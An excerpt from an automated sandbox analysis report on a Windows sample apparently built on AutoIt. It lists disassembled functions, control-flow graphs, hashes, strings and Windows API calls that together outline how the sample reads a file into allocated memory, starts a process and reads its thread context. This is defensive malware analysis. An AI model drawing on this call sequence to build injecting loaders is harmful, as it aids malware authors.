                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                        • String ID: TaskbarCreated
                                                        • API String ID: 129472671-2362178303
                                                        • Opcode ID: d6974ec5d123213d006dd8ba36f56123adea462ec888840d7b223953b3c7da3a
                                                        • Instruction ID: a8e8d26ab2283f7065e72dd2f01f83b1d1ec79a3575d8864015090e58de77b82
                                                        • Opcode Fuzzy Hash: d6974ec5d123213d006dd8ba36f56123adea462ec888840d7b223953b3c7da3a
                                                        • Instruction Fuzzy Hash: 41413A31240264ABEB153B7C9C1EBB9365FEB47380F448125FA0696391C7699F428FA9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: D%w$D%w$D%w$D%w$D%wD%w$Variable must be of type 'Object'.
                                                        • API String ID: 0-3922967373
                                                        • Opcode ID: efe0a8cc96d5ce75af95dcc7fd66ce657cb498919dc02398aa0a3a394dbc2860
                                                        • Instruction ID: ffeef7e262fbe13ef093022b089117fe5b5f5ae29ac576b71f656bc03060d99e
                                                        • Opcode Fuzzy Hash: efe0a8cc96d5ce75af95dcc7fd66ce657cb498919dc02398aa0a3a394dbc2860
                                                        • Instruction Fuzzy Hash: 9AC26E71A00215CFCB24EF58C880AADB7B2FF4A310F248569E915AB391D376ED82CF55
                                                        APIs
                                                        • __Init_thread_footer.LIBCMT ref: 006AFE66
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Init_thread_footer
                                                        • String ID: D%w$D%w$D%w$D%w$D%wD%w
                                                        • API String ID: 1385522511-3872119899
                                                        • Opcode ID: b08e8b66bef18a214911eb3083d964fb502ee1d49fbfdbab5a6888196080c428
                                                        • Instruction ID: 6571857665a7385143f30235e3cd276c7cdef94c3a5275d68ac8b65d9b40f90b
                                                        • Opcode Fuzzy Hash: b08e8b66bef18a214911eb3083d964fb502ee1d49fbfdbab5a6888196080c428
                                                        • Instruction Fuzzy Hash: 25B27C74604340CFDB14EF58C480A6AB7E2BF9A310F24896DE9998B351D775ED82CF92

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1452 16d5468-16d5516 call 16d2eb8 1455 16d551d-16d5543 call 16d6378 CreateFileW 1452->1455 1458 16d554a-16d555a 1455->1458 1459 16d5545 1455->1459 1464 16d555c 1458->1464 1465 16d5561-16d557b VirtualAlloc 1458->1465 1460 16d5695-16d5699 1459->1460 1462 16d56db-16d56de 1460->1462 1463 16d569b-16d569f 1460->1463 1466 16d56e1-16d56e8 1462->1466 1467 16d56ab-16d56af 1463->1467 1468 16d56a1-16d56a4 1463->1468 1464->1460 1471 16d557d 1465->1471 1472 16d5582-16d5599 ReadFile 1465->1472 1473 16d573d-16d5752 1466->1473 1474 16d56ea-16d56f5 1466->1474 1469 16d56bf-16d56c3 1467->1469 1470 16d56b1-16d56bb 1467->1470 1468->1467 1477 16d56c5-16d56cf 1469->1477 1478 16d56d3 1469->1478 1470->1469 1471->1460 1479 16d559b 1472->1479 1480 16d55a0-16d55e0 VirtualAlloc 1472->1480 1475 16d5754-16d575f VirtualFree 1473->1475 1476 16d5762-16d576a 1473->1476 1481 16d56f9-16d5705 1474->1481 1482 16d56f7 1474->1482 1475->1476 1477->1478 1478->1462 1479->1460 1483 16d55e7-16d5602 call 16d65c8 1480->1483 1484 16d55e2 1480->1484 1485 16d5719-16d5725 1481->1485 1486 16d5707-16d5717 1481->1486 1482->1473 1492 16d560d-16d5617 1483->1492 1484->1460 1489 16d5727-16d5730 1485->1489 1490 16d5732-16d5738 1485->1490 1488 16d573b 1486->1488 1488->1466 1489->1488 1490->1488 1493 16d5619-16d5648 call 16d65c8 1492->1493 1494 16d564a-16d565e call 16d63d8 1492->1494 1493->1492 1500 16d5660 1494->1500 1501 16d5662-16d5666 1494->1501 1500->1460 1502 16d5668-16d566c CloseHandle 1501->1502 1503 16d5672-16d5676 1501->1503 1502->1503 1504 16d5678-16d5683 VirtualFree 1503->1504 1505 16d5686-16d568f 1503->1505 1504->1505 1505->1455 1505->1460
                                                        APIs
                                                        • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 016D5539
                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 016D575F
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366602900.00000000016D2000.00000040.00000020.00020000.00000000.sdmp, Offset: 016D2000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_16d2000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: CreateFileFreeVirtual
                                                        • String ID:
                                                        • API String ID: 204039940-0
                                                        • Opcode ID: e7fcc9d0c03c8eebee60ddba528add67e317e316073a556d8272a5bdc8b54fa5
                                                        • Instruction ID: 03129038d9e7abea4237032da804df2473978c023a55ee183a2bbd065af5f61e
                                                        • Opcode Fuzzy Hash: e7fcc9d0c03c8eebee60ddba528add67e317e316073a556d8272a5bdc8b54fa5
                                                        • Instruction Fuzzy Hash: 99A12874E00219EBEB14CFA4D894BEEBBB5FF48304F208159E616BB290D7759A41CF54

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1516 6a2c63-6a2cd3 CreateWindowExW * 2 ShowWindow * 2
                                                        APIs
                                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 006A2C91
                                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 006A2CB2
                                                        • ShowWindow.USER32(00000000,?,?,?,?,?,?,006A1CAD,?), ref: 006A2CC6
                                                        • ShowWindow.USER32(00000000,?,?,?,?,?,?,006A1CAD,?), ref: 006A2CCF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Window$CreateShow
                                                        • String ID: AutoIt v3$edit
                                                        • API String ID: 1584632944-3779509399
                                                        • Opcode ID: 7d00eee0509e142176854120279c4be3ea08b07f1592a5916968099c553644d7
                                                        • Instruction ID: 3669ee9fb0b0016539ebfa53d798443d640edb681a386b90643bb3a8f0e52219
                                                        • Opcode Fuzzy Hash: 7d00eee0509e142176854120279c4be3ea08b07f1592a5916968099c553644d7
                                                        • Instruction Fuzzy Hash: 0CF0DA756503947AEB31172BAC09E773EBDD7C6F90F41806AF908A25A0C6691890DBB8

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1631 16d5268-16d535f call 16d2eb8 call 16d5158 CreateFileW 1638 16d5366-16d5376 1631->1638 1639 16d5361 1631->1639 1642 16d537d-16d5397 VirtualAlloc 1638->1642 1643 16d5378 1638->1643 1640 16d5413-16d5418 1639->1640 1644 16d5399 1642->1644 1645 16d539b-16d53b2 ReadFile 1642->1645 1643->1640 1644->1640 1646 16d53b4 1645->1646 1647 16d53b6-16d53f0 call 16d5198 call 16d4158 1645->1647 1646->1640 1652 16d540c-16d5411 ExitProcess 1647->1652 1653 16d53f2-16d5407 call 16d51e8 1647->1653 1652->1640 1653->1652
                                                        APIs
                                                          • Part of subcall function 016D5158: Sleep.KERNELBASE(000001F4), ref: 016D5169
                                                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 016D5355
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366602900.00000000016D2000.00000040.00000020.00020000.00000000.sdmp, Offset: 016D2000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_16d2000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: CreateFileSleep
                                                        • String ID: 2AO2KQ8QAEL9
                                                        • API String ID: 2694422964-2974333907
                                                        • Opcode ID: 91787aa301791e46254a0c8560b42bbb9b8370fe39e4805e15942bc600435f7e
                                                        • Instruction ID: 777e4f6fceb1179d3c85c3b13f7fd144d7edffba916133e63712d7ee2ccaad6e
                                                        • Opcode Fuzzy Hash: 91787aa301791e46254a0c8560b42bbb9b8370fe39e4805e15942bc600435f7e
                                                        • Instruction Fuzzy Hash: DF51A131D04249EBEF11DBA4CC18BEEBB79AF04300F004599E609BB2C1D7B91B45CBA6

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1655 712947-7129b9 call 6e1f50 call 7125d6 call 6bfe0b call 6a5722 call 71274e call 6a511f call 6c5232 1670 712a6c-712a73 call 712e66 1655->1670 1671 7129bf-7129c6 call 712e66 1655->1671 1676 712a75-712a77 1670->1676 1677 712a7c 1670->1677 1671->1676 1678 7129cc-712a6a call 6cd583 call 6c4983 call 6c9038 call 6cd583 call 6c9038 * 2 1671->1678 1679 712cb6-712cb7 1676->1679 1681 712a7f-712b3a call 6a50f5 * 8 call 713017 call 6ce5eb 1677->1681 1678->1681 1682 712cd5-712cdb 1679->1682 1720 712b43-712b5e call 712792 1681->1720 1721 712b3c-712b3e 1681->1721 1685 712cf0-712cf6 1682->1685 1686 712cdd-712ced call 6bfdcd call 6bfe14 1682->1686 1686->1685 1724 712bf0-712bfc call 6ce678 1720->1724 1725 712b64-712b6c 1720->1725 1721->1679 1732 712c12-712c16 1724->1732 1733 712bfe-712c0d DeleteFileW 1724->1733 1726 712b74 1725->1726 1727 712b6e-712b72 1725->1727 1729 712b79-712b97 call 6a50f5 1726->1729 1727->1729 1739 712bc1-712bd7 call 71211d call 6cdbb3 1729->1739 1740 712b99-712b9e 1729->1740 1735 712c91-712ca5 CopyFileW 1732->1735 1736 712c18-712c7e call 7125d6 call 6cd2eb * 2 call 7122ce 1732->1736 1733->1679 1737 712ca7-712cb4 DeleteFileW 1735->1737 1738 712cb9-712ccf DeleteFileW call 712fd8 1735->1738 1736->1738 1760 712c80-712c8f DeleteFileW 1736->1760 1737->1679 1747 712cd4 1738->1747 1754 712bdc-712be7 1739->1754 1744 712ba1-712bb4 call 7128d2 1740->1744 1755 712bb6-712bbf 1744->1755 1747->1682 1754->1725 1757 712bed 1754->1757 1755->1739 1757->1724 1760->1679
                                                        APIs
                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00712C05
                                                        • DeleteFileW.KERNEL32(?), ref: 00712C87
                                                        • CopyFileW.KERNELBASE(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00712C9D
                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00712CAE
                                                        • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00712CC0
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: File$Delete$Copy
                                                        • String ID:
                                                        • API String ID: 3226157194-0
                                                        • Opcode ID: 3285887559431275b7482fd611d212feba65ff24f5dcd91d45835d2706988a25
                                                        • Instruction ID: cc46a9c22739739b5abb486725945e7a3c1014e337fc8b54c3161ac9e504f3ea
                                                        • Opcode Fuzzy Hash: 3285887559431275b7482fd611d212feba65ff24f5dcd91d45835d2706988a25
                                                        • Instruction Fuzzy Hash: 87B16271900119ABDF11EFA4CC85EEE777DEF05350F1040AAF609E6182EA349E958FA4

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1761 6d5aa9-6d5ace 1762 6d5ad7-6d5ad9 1761->1762 1763 6d5ad0-6d5ad2 1761->1763 1765 6d5adb-6d5af5 call 6cf2c6 call 6cf2d9 call 6d27ec 1762->1765 1766 6d5afa-6d5b1f 1762->1766 1764 6d5ca5-6d5cb4 call 6c0a8c 1763->1764 1765->1764 1767 6d5b26-6d5b2c 1766->1767 1768 6d5b21-6d5b24 1766->1768 1772 6d5b2e-6d5b46 call 6cf2c6 call 6cf2d9 call 6d27ec 1767->1772 1773 6d5b4b 1767->1773 1768->1767 1771 6d5b4e-6d5b53 1768->1771 1777 6d5b55-6d5b61 call 6d9424 1771->1777 1778 6d5b64-6d5b6d call 6d564e 1771->1778 1810 6d5c9c-6d5c9f 1772->1810 1773->1771 1777->1778 1789 6d5b6f-6d5b71 1778->1789 1790 6d5ba8-6d5bba 1778->1790 1792 6d5b95-6d5b9e call 6d542e 1789->1792 1793 6d5b73-6d5b78 1789->1793 1795 6d5bbc-6d5bc2 1790->1795 1796 6d5c02-6d5c23 WriteFile 1790->1796 1809 6d5ba3-6d5ba6 1792->1809 1797 6d5c6c-6d5c7e 1793->1797 1798 6d5b7e-6d5b8b call 6d55e1 1793->1798 1803 6d5bc4-6d5bc7 1795->1803 1804 6d5bf2-6d5c00 call 6d56c4 1795->1804 1801 6d5c2e 1796->1801 1802 6d5c25-6d5c2b GetLastError 1796->1802 1807 6d5c89-6d5c99 call 6cf2d9 call 6cf2c6 1797->1807 1808 6d5c80-6d5c83 1797->1808 1821 6d5b8e-6d5b90 1798->1821 1811 6d5c31-6d5c3c 1801->1811 1802->1801 1812 6d5bc9-6d5bcc 1803->1812 1813 6d5be2-6d5bf0 call 6d5891 1803->1813 1804->1809 1807->1810 1808->1807 1819 6d5c85-6d5c87 1808->1819 1809->1821 1815 6d5ca4 1810->1815 1822 6d5c3e-6d5c43 1811->1822 1823 6d5ca1 1811->1823 1812->1797 1814 6d5bd2-6d5be0 call 6d57a3 1812->1814 1813->1809 1814->1809 1815->1764 1819->1815 1821->1811 1827 6d5c69 1822->1827 1828 6d5c45-6d5c4a 1822->1828 1823->1815 1827->1797 1831 6d5c4c-6d5c5e call 6cf2d9 call 6cf2c6 1828->1831 1832 6d5c60-6d5c67 call 6cf2a3 1828->1832 1831->1810 1832->1810
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: JOj
                                                        • API String ID: 0-1489635976
                                                        • Opcode ID: a906b44e9d5f2accd48c3a5788b20eab87234cbf0ff31ef1b00e9afe9125f880
                                                        • Instruction ID: 89144d97bd16eed238273992dc78ebfb324f74592f393f54af0da76b7f3bfd63
                                                        • Opcode Fuzzy Hash: a906b44e9d5f2accd48c3a5788b20eab87234cbf0ff31ef1b00e9afe9125f880
                                                        • Instruction Fuzzy Hash: B851CC71D1060AABDB21AFA8C845FFEBBBAEF05310F14005FF406A7791D6758A02DB65

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1876 6a3b1c-6a3b27 1877 6a3b99-6a3b9b 1876->1877 1878 6a3b29-6a3b2e 1876->1878 1880 6a3b8c-6a3b8f 1877->1880 1878->1877 1879 6a3b30-6a3b48 RegOpenKeyExW 1878->1879 1879->1877 1881 6a3b4a-6a3b69 RegQueryValueExW 1879->1881 1882 6a3b6b-6a3b76 1881->1882 1883 6a3b80-6a3b8b RegCloseKey 1881->1883 1884 6a3b78-6a3b7a 1882->1884 1885 6a3b90-6a3b97 1882->1885 1883->1880 1886 6a3b7e 1884->1886 1885->1886 1886->1883
                                                        APIs
                                                        • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,006A3B0F,SwapMouseButtons,00000004,?), ref: 006A3B40
                                                        • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,006A3B0F,SwapMouseButtons,00000004,?), ref: 006A3B61
                                                        • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,006A3B0F,SwapMouseButtons,00000004,?), ref: 006A3B83
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: CloseOpenQueryValue
                                                        • String ID: Control Panel\Mouse
                                                        • API String ID: 3677997916-824357125
                                                        • Opcode ID: 920c484920e910c027885b18d45bcea7972e6b0605e33e78b2edc87b0fb38aef
                                                        • Instruction ID: c278095823588984c3545b34803c642b5e185ef8933137e974e1e6d8679d82fb
                                                        • Opcode Fuzzy Hash: 920c484920e910c027885b18d45bcea7972e6b0605e33e78b2edc87b0fb38aef
                                                        • Instruction Fuzzy Hash: 6B115AB5510218FFDB219FA4DC84AEEB7BAEF21740B108459B801E7210E3319E409B64
                                                        APIs
                                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 016D4913
                                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 016D49A9
                                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 016D49CB
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366602900.00000000016D2000.00000040.00000020.00020000.00000000.sdmp, Offset: 016D2000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_16d2000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                        • String ID:
                                                        • API String ID: 2438371351-0
                                                        • Opcode ID: f7a3111ab7015fd8b62422fe8fc399687c9bf18e9b49b2a513bdf356eeec8a8c
                                                        • Instruction ID: d11df70502c801db2411e2a6aff42fd214ed041171108a6a0106ff77978cfd3c
                                                        • Opcode Fuzzy Hash: f7a3111ab7015fd8b62422fe8fc399687c9bf18e9b49b2a513bdf356eeec8a8c
                                                        • Instruction Fuzzy Hash: EA62FB30E142589BEB24CBA4CC50BDEB776EF58300F1091A9D20DEB794EB759E81CB59
                                                        APIs
                                                        • GetOpenFileNameW.COMDLG32(?), ref: 006E2C8C
                                                          • Part of subcall function 006A3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006A3A97,?,?,006A2E7F,?,?,?,00000000), ref: 006A3AC2
                                                          • Part of subcall function 006A2DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 006A2DC4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Name$Path$FileFullLongOpen
                                                        • String ID: X$`ev
                                                        • API String ID: 779396738-137022389
                                                        • Opcode ID: d32de77a6666c188ebe091fc969d945170d9f81737e6985bc958103aa5a33940
                                                        • Instruction ID: 412f0e8ff1651df7d22665722c799b177f948582de0ee5dd77cd4f4f91568baf
                                                        • Opcode Fuzzy Hash: d32de77a6666c188ebe091fc969d945170d9f81737e6985bc958103aa5a33940
                                                        • Instruction Fuzzy Hash: 8321C671A002989BDB41EF98C805BEE7BFEAF49304F00805DE505B7241DFB85A898FA5
                                                        APIs
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 006C0668
                                                          • Part of subcall function 006C32A4: RaiseException.KERNEL32(?,?,?,006C068A,?,00771444,?,?,?,?,?,?,006C068A,006A1129,00768738,006A1129), ref: 006C3304
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 006C0685
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Exception@8Throw$ExceptionRaise
                                                        • String ID: Unknown exception
                                                        • API String ID: 3476068407-410509341
                                                        • Opcode ID: 7b96867d8013c83f7760ef1c7ac9875456a11a71e0a7583b638fa25e6ce91ac8
                                                        • Instruction ID: a1702f1184182b609d58283a6e73d5cfd1780fdd8833ab9c8d9f41e0c6814faf
                                                        • Opcode Fuzzy Hash: 7b96867d8013c83f7760ef1c7ac9875456a11a71e0a7583b638fa25e6ce91ac8
                                                        • Instruction Fuzzy Hash: B5F0F474900208B78F40BAA4DC46EED776EDE00300B60413DB814C16A2EF71DB568684
                                                        APIs
                                                        • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 0071302F
                                                        • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00713044
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Temp$FileNamePath
                                                        • String ID: aut
                                                        • API String ID: 3285503233-3010740371
                                                        • Opcode ID: dd7e8893bbe8f651c8f45fd737fce027b20f8524c0caaf26900e22179a2930ea
                                                        • Instruction ID: 8d380a8cbfcbf10de0ce1b07167216f253c52997878b15e6a74cee53ee1be31e
                                                        • Opcode Fuzzy Hash: dd7e8893bbe8f651c8f45fd737fce027b20f8524c0caaf26900e22179a2930ea
                                                        • Instruction Fuzzy Hash: D0D05B7250032467DA2097949C0DFC73A6CD704751F4042517A55E6091DAB49544CBD4
                                                        APIs
                                                        • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 007282F5
                                                        • TerminateProcess.KERNEL32(00000000), ref: 007282FC
                                                        • FreeLibrary.KERNEL32(?,?,?,?), ref: 007284DD
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Process$CurrentFreeLibraryTerminate
                                                        • String ID:
                                                        • API String ID: 146820519-0
                                                        • Opcode ID: 7b7b0f9912f175dfd068cbb5be1be3e1964c2a114d720341a7c8b20518bb65f2
                                                        • Instruction ID: 035dd4d5ec4bf6e9eda1754c248b224f32457306463f3fbb3c3a272e7b5c84e5
                                                        • Opcode Fuzzy Hash: 7b7b0f9912f175dfd068cbb5be1be3e1964c2a114d720341a7c8b20518bb65f2
                                                        • Instruction Fuzzy Hash: E5127A71908351DFC764DF28C484B2ABBE1BF89314F04895DE8998B252DB35ED45CF92
                                                        APIs
                                                          • Part of subcall function 006A1BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 006A1BF4
                                                          • Part of subcall function 006A1BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 006A1BFC
                                                          • Part of subcall function 006A1BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 006A1C07
